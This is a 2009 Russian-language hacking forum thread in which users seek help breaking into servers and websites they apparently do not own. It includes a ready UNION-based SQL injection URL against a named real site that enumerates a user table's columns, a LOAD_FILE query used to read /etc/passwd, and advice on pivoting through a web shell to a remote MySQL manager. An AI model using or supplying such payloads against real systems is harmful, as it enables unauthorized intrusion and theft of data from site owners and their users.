26.08.2009, 22:22
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от jangle
2 Byrger
А что ты сам хочешь от сервака? Какая цель конечная?
Вариант - читать файлы в таблицу и просматривая их двигаться дальше
Рутовский пас пробуй с логином Administrator (если винда) к имеющимся сервисам - FTP, RDP etc
Надо слить файлы оттуда
Просканих xSpider`ом открыто 3 покта
2 это 2 для этого ПО
1 это MySQL
Может можно как-то просмотреть где находятся файлы...и слить?
|
|
|
26.08.2009, 22:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Да если есьт шелл на http серваке, ставь проксю его, FreeCap на удалённый менеджер mYSQL
Думаю юзера и пасс знаешь.
Если знаешь то впустит.
|
|
|
|
26.08.2009, 22:46
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
|
|
|
|
26.08.2009, 22:50
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от jecka3000
есть сайт, на котором лично я ничего не нашел, ни одной дырочки. Но на том же ИП крутиться еще более 200 сайтов. Как просканить эти сайты на уязвимости автоматически,ибо вручную не хватит и всей жизни.
Вручную парниш 
Рандомом выбери и посмотри.
Или же смотри на античате в скулях или инклюдах.
|
|
|
|
26.08.2009, 23:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
|
|
|
|
26.08.2009, 23:33
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от jecka3000
Говорил с суппортом одного хостинга, он говорит, что в современных хостах все акки изолированны друг от друга, что взлом через смежные сайты невозможен. Правда это или гон?
Как пафосно то реклама не более. Всё зависит от хостера... Что значит "в современных хостах"? Он тебе описал скорее не "современные хосты", а то как должно быть у нормального хостера... а дебилы, как были, так и будут, хоть у "современных", хоть у "старомодных" хостеров...
|
|
|
|
26.08.2009, 23:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Правда конечно. Что ты
|
|
|
|
26.08.2009, 23:53
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
|
|
|
|
27.08.2009, 00:03
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от jecka3000
очень прошу помочь раскрутить скулю: http://www.poraduy.ru/catalog/?id=99'
http://www.poraduy.ru/catalog/?id=-99+union+select+group_concat(column_name+separator +0x0a)+from+information_schema.columns+where+table _name=0x70687062625f61636c5f7573657273
|
|
|
|
27.08.2009, 00:13
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сделал запрос в ту маштнку такого вида
SELECT 1,2,3,LOAD_FILE('../../../etc/passwd'),5,6,7 FROm access
Мне выдался passwd как с помошью него можно на сервер залезть?
Пытался через Pytty подключится но сказал типо сервер недоступен...даже не спросил логин |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
